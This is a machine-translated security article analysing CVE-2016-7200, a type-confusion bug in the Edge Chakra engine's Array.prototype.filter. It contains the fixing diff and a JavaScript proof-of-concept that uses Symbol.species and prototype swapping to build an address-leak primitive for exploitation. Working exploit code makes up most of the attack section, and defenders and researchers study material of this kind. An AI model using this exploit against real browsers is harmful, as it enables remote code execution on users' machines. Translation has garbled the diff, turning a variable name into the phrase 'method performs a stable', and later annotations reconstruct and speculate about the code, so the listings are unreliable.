myhack58佚名MYHACK58:62201786300

Windows 10 x64 Edge CVE-2016-7200 & CVE-2016-7201 vulnerability analysis and exploit — vulnerability warning — myhack58 (黑吧安全网)

2017-05-21 00:00:00
佚名
www.myhack58.com

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

7.6 High

CVSS2

Access Vector

NETWORK

Access Complexity

HIGH

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:H/Au:N/C:C/I:C/A:C

0.971 High

EPSS

Percentile

99.7%

## 1. Analysis environment

Operating system: Windows 10 x64 Professional, build 10.0.14393. Browser: Microsoft Edge x64 38.14393.0.

## 2. CVE-2016-7200 analysis

This vulnerability is a type confusion in JavascriptArray::FilterHelper, Chakra's implementation of Array.prototype.filter. Look at the fixing commit below. Note that the listing is a machine-translated rendering of the diff: the lines shown as bullets (and the `+#if ENABLE_COPYONACCESS_ARRAY` lines) were added by the fix, the line beginning with `- RecyclableObject* newObj` was removed, and the local that receives `args[2]` (the callback's optional `thisArg`) has been mangled into "method performs a stable".

template <typename T> Var JavascriptArray::FilterHelper(JavascriptArray* pArr, RecyclableObject* obj, T length, Arguments& args, ScriptContext* scriptContext)
{ if (args. Info. Count < 2 || ! JavascriptConversion::IsCallable(args[1]))
{
JavascriptError::ThrowTypeError(scriptContext, JSERR_FunctionArgument_NeedFunction, _u(“Array. prototype. filter”));
}

RecyclableObject* callBackFn = RecyclableObject::FromVar(args[1]); Var method performs a stable = nullptr; if (args. Info. Count > 2)
{
method performs a stable = args[2];
} else {
method performs a stable = scriptContext->GetLibrary()->GetUndefined();
} // If the source object is an Array exotic object we should try to load the constructor property and use it to construct the return object. - RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);

  • bool isBuiltinArrayCtor = true;
  • RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext, nullptr, nullptr, &isBuiltinArrayCtor);
    JavascriptArray* newArr = nullptr; if (newObj == nullptr)
    {
    newArr = scriptContext->GetLibrary()->CreateArray(0);
    newArr->EnsureHead<Var>();
    newObj = newArr;
    } else { // If the new object we created is an array, remember that as it will save us time setting properties in the object below if (JavascriptArray::Is(newObj))
    {
    +#if ENABLE_COPYONACCESS_ARRAY + JavascriptLibrary::CheckAndConvertCopyOnAccessNativeintarray<Var>(newObj);
    +#endif newArr = JavascriptArray::FromVar(newObj);
    }
    } Var element = nullptr; Var selected = nullptr; if (pArr)
    {
    Assert(length <= MaxArrayLength);
    uint32 i = 0; for (uint32 k = 0; k < length; k++)
    { if (! pArr->DirectGetItemAtFull(k, &element))
    { continue;
    }

selected = callBackFn->GetEntryPoint()(callBackFn, CallInfo(CallFlags_Value, 4), The method performs a stable,
element,
JavascriptNumber::ToVar(k, scriptContext),
pArr); if (JavascriptConversion::ToBoolean(selected, scriptContext))
{ // Try to fast path if the return object is an array - if (newArr)

  • if (newArr && isBuiltinArrayCtor)
    {
    newArr->DirectSetItemAt(i, element);
    }

Now look at the PoC (the listing below has been repaired from the page's garbled rendering: `.slice()`, `[Symbol.species]` and `__proto__` were broken by the machine translation):

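// PoC for CVE-2016-7200 (type confusion in Chakra's JavascriptArray::FilterHelper).
// Restored from the page's garbled listing: ".slice()", "[Symbol.species]" and
// "__proto__" had been mangled by the machine translation, and the loop variable
// `item` is now declared instead of leaking as an implicit global.
//
// x is a 16-element array whose first slot is 56; presumably its raw element
// storage is meant to be reinterpreted once the confusion triggers (the later
// pages of the write-up should be consulted for the exact layout — TODO confirm).
var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)).slice();
var [hi, lo] = PutDataAndGetAddr(x);

// Runs Array.prototype.filter on an array whose prototype has been swapped to a
// subclass whose Symbol.species constructor returns the pre-made array `d`
// instead of a fresh one. Before the fix, FilterHelper's fast path stored the
// kept elements into that species result with DirectSetItemAt; the PoC then
// reads the result back as numbers. Returns [h[3], h[2]], which the caller
// names hi and lo.
// t: value placed at index 1 of the array being filtered.
function PutDataAndGetAddr(t) {
  var d = new Array(1, 2, 3);

  // Constructor that returns an already-existing object; used as the species ctor.
  class dummy {
    constructor() {
      return d;
    }
  }

  // Array subclass that redirects species construction to dummy.
  class MyArray extends Array {
    static get [Symbol.species]() {
      return dummy;
    }
  }

  var a = new Array({}, t, "theori", 7, 7, 7, 7, 7);

  // Filter callback that keeps every element.
  function test(i) {
    return true;
  }

  a.__proto__ = MyArray.prototype;
  var o = a.filter(test);

  var h = [];
  for (var item in o) {
    var n = new Number(o[item]);
    // Fold negative values into their unsigned 32-bit representation.
    if (n < 0) {
      n = n + 0x100000000;
    }
    h.push(n);
  }
  return [h[3], h[2]];
}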

